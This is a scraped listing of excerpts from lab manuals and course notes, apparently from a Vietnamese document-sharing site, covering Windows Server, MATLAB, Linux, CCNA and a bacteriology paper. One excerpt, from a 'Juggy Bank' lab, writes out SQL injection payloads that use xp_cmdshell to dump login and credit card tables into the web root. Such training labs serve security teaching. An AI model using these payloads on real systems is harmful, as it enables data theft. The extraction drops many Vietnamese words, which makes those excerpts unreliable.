63686 santas toys lab

Giáo trình LAB hoàn chỉnh

Giáo trình LAB hoàn chỉnh
... Tiến trình Preparing Installation (Chuẩn bị cài đặt) thực mà trình cài đặt chép file vào đĩa cứng Bước cài đặt Windows bắt đầu với trình phát phần cứng, trình diễn vài phút Không giống chu trình ... 20 Khi trình cấu hình hoàn thành xong, trang “Completing The Active Directory Installation Wizard” (Hoàn thành trình cài đặt Active Directory) xuất Nhấn Finish 21 Một hộp thoại thông báo trình ... Trong khóa bạn lưu chụp hình bạn thu mục Labwork cho Thực hành cụ thể Ví dụ chụp hình cho Thực hành lưu thư mục D:\VIRTUALPC\’TENLOP’ \Lab manual\ Lab0 1\Labwork Nhập vào tên tương ứng cho chụp...
 • 180
 • 533
 • 10

Lab Juggy Bank SQL injection

Lab Juggy Bank SQL injection
... ';exec master xp_cmdshell 'osql -E -Q "select * from master sysdatabases" -o c:\inetpub\wwwroot\masterdatabase.txt' -';exec master xp_cmdshell 'osql -E -Q "select * from juggybank sysobjects where ... http://localhost/card_details.txt To dump the login details ';exec master xp_cmdshell 'osql -E -Q "select * from juggybank userinfo" o c:\inetpub\wwwroot\logins.txt' -To fetch those details off the web ... Now let’s dump the credit card details into a txt file ';exec master xp_cmdshell 'osql -E -Q "select * from juggybank creditcard" -o c:\inetpub\wwwroot\card_details.txt' To fetch those details...
 • 5
 • 591
 • 3

Tài liệu MAT LAB cơ bản

Tài liệu MAT LAB cơ bản
... để số liệu đa vào disp(a) hiển thị nội dung mảng a hay văn a=[1 3]; disp(a) t='Xin chao'; disp(t) format điều khiển khuôn dạng số Lệnh format format short format long format short e format long ... trống f M-file : M-file file text chứa mã MATLAB Để tạo ma trận ta viết m-file cho MATLAB đọc file Ví dụ ta tạo file solieu.m nh sau A=[ 3 4 ] nạp vào MATLAB cách đánh lệnh : solieu g Lắp ghép :Ta ... format format short format long format short e format long e format short g format long g format hex format bank format rat format + Kết Default Same as short digit scaled fixed point 15 digit...
 • 26
 • 358
 • 1

Lab Linux phan I, II Installing Linux as a Server

Lab Linux phan I, II Installing Linux as a Server
... packages có tên samba rpm –qa samba* => liệt kê packages có tên bắt đầu samba rpm –qa | grep samba => liệt kê packages có tên ch a samba rpm –qd samba => liệt kê files tài liệu liên quan đến samba ... a Cao, Q.1, TP.HCM Tel: (84-8) 38244041 – 0989012418 www.athena.edu.vn - Bạn liệt kê danh sách packages cài đặt (Installed packages) danh sách packages dùng cho bạn download (Available packages) ... TẠO QUẢN TRỊ VÀ AN NINH MẠNG ATHENA Bis Đinh Tiên Hoàng, P a Cao, Q.1, TP.HCM Tel: (84-8) 38244041 – 0989012418 www.athena.edu.vn Bài Lab 2: Package Management - Redhat Package Manager (RPM) công...
 • 99
 • 787
 • 6

Tài liệu MAT LAB toàn tập

Tài liệu MAT LAB toàn tập
... thực MATLAB Hiển thị sửa đờng dẫn MATLAB (MATLABpath) Hàm M_file, nơi mà mmatlabpath Chia đờng dẫn cho matlabpath Giống nh cd Bỏ th mục dir1 từ đờng dẫn matlabpath script M_file thực MATLAB khởi ... browser MATLAB 5.2 Cửa sổ path browser MATLAB 5.0 không khác so với MATLAB 5.2, chủ yếu nút thay đổi đờng dẫn MATLAB 5.2 đặt đỉnh MATLAB 5.0 đợc đặt bên phải Để ghi lại thay đổi đờng dẫn MATLAB 5.0 ... Ebook Team 24 Hình 5.2 path browser MATLAB to Student khởi 5.1 MATLAB khởi động Khi khởi động MATLAB, tạo hai script M_file matlabrc.m startup.m, atlabrc.m MATLAB, nhìn chung không đợc sửa Các...
 • 215
 • 310
 • 1

LAB Xây dựng CA Server trên Workgroup và Domain

LAB Xây dựng CA Server trên Workgroup và Domain
... gccom2 tiến hành cài CA lên để ứng dụng CA vào việc ký tên điện tử mã hóa Email sau: Vào địa http://[IP máy CA Server] /certsrv Nhấp vào Request a certificate để yêu cầu CA Server cấp chứng thực ... Certificates Các user sau chứng thực phải tiến hành cài CA lên cách vào lại trang Web CA Server chọn View the status of a pending certificate request Nhấp vào Link Email Protection Certificate ... tên tạo Email thứ với: Subject Test CA Nội dung Test CA nhấp vào nút Sign bên gởi Tiếp theo tạo Email thứ với: Subject Test CA Nội dung Test CA nhấp vào nút Sign Encrypt bên gởi Lúc Outlook...
 • 51
 • 1,364
 • 13

Acetic Acid Bacteria - screening of LAB strains

Acetic Acid Bacteria - screening of LAB strains
... the occurrence of lactic acid bacteria spectrum, L plantarum constituted the highest number of LAB isolated from fermented plant materials The involvement of various types of LAB in fermented ... of One hundred and thirteen lactic acid bacteria isolates were obtained from seven fermented 742 World Appl Sci J., (5): 74 1-7 47, 2008 Table 1: Species and frequency of occurrence of lactic acid ... according to the method of Garcia-Garibay and Marshall [19] The lactic acid culture was treated with 17% (w/v) of 80% trichloroacetic acid solution and centrifuged at 16,000-x g at 4°Cfor 30min.The...
 • 7
 • 354
 • 1

Thực hành Mat Lab bài II

Thực hành Mat Lab bài II
... b: biến chứa kết s: tên biến chứa chuỗi ký tự d) Ví dụ: a = ‘MaTlab WORks’ b = upper(a) b = MATLAB b = upper(‘MaTlab WORks’) b= MATLAB WORKS 14 Lệnh all a) Công dụng: Kiểm tra vector hay ma trận ... Ví dụ: s = str 2mat( mat , lab ) s= mat lab 11 Lệnh str2num a) Công dụng: Chuyển chuỗi (dạng số) sang số thực b) Cú pháp: n = str2num(s) c) Giải thích: s: chuỗi dạng số n: số thực d) Ví dụ: n ... Lệnh break Chấm dứt thực vòng lặp lệnh while for Phần Thực hành viết chương trình Matlab Thực viết chương trình với yêu cầu sau: Viết chương trình cho phép nhập vào số n thực sau: a) Nếu n...
 • 21
 • 250
 • 1

Tổng hợp các bài lab CCNA từ VNPRO

Tổng hợp các bài lab CCNA từ VNPRO
... with CNTL/Z – Một số tổ hợp phím tắt: Kỳ thi CCNA đòi hỏi người học phải sử dụng thành thạo tổ hợp phím tắt Ngòai ra, số chương trình dùng làm terminal không hỗ trợ tổ hợp phím Ctrl-A Trở về ... vien lop CCNA # Router(config)#^Z Router# %SYS-5-CONFIG_I: Configured from console by console Router#exit Router con0 is now available Press RETURN to get started Chao cac hoc vien lop CCNA Router> ... privileged mode của router Lab 1-8: Nạp IOS từ TFTP Server cho router chạy từ Flash Lab 1-8: Nạp IOS Image từ TFTP Server cho router chạy từ Flash Mô tả Bài thực hành này mô tả cách...
 • 55
 • 2,175
 • 17

Quản trị mạng LAB 1 - Basic config router

Quản trị mạng LAB 1 - Basic config router
... Save the configuration to NVRAM Router # copy running -config startup -config +Copy file startup -config from router to TFTP server at 19 2 .16 8 .1. 253 Router# copy startup -config tftp Example: 10 -Perform ... telnet Router (config- line)#password cisco +Allow login Router (config- line)#login 4- Configure password for accessing enable mode : 12 3456 This password must be encrypted with md5 Router (config) #enable ... command Router #show version 8- Base on the above show command , identify the name of IOS on the router 9- Copy file startup -config from router to TFTP sever at 19 2 .16 8 .1. 253 (instructor may indicate...
 • 4
 • 278
 • 3

Quản trị mạng LAB 3 - LAN switching

Quản trị mạng LAB 3 - LAN switching
... table: Vlan www.ipmac.com.vn Vlan Name Port Vlan Vlan Vlan Fa0/2 Fa0 /3 Fa0/4 The command vlan database can be used in the Privileged EXEC mode to enter into VLAN configuration mode A VLAN name ... Switch_A#vlan database Switch_A(vlan)#vlan vlan_number Switch_A(vlan)#exit Issue Show vlan to view configuration : Upon exiting, the VLAN is applied to the switch The next step is to assign the VLAN ... switch: Switch(vlan)#vtp {client | server | transparent} Switch_A(vlan)#vtp server Switch_B(vlan)#vtp client Create vlan on Switch A, be sure that information about vlan is updated in vlan database...
 • 6
 • 374
 • 2

Quản trị mạng Lab 4-5 - RIP & IGRP

Quản trị mạng Lab 4-5 - RIP & IGRP
... tra kết quả: Router(config)#exit Router#show ip route Router#show ip protocol Router#debug ip rip www.ipmac.com.vn ...
 • 2
 • 202
 • 5

Xem thêm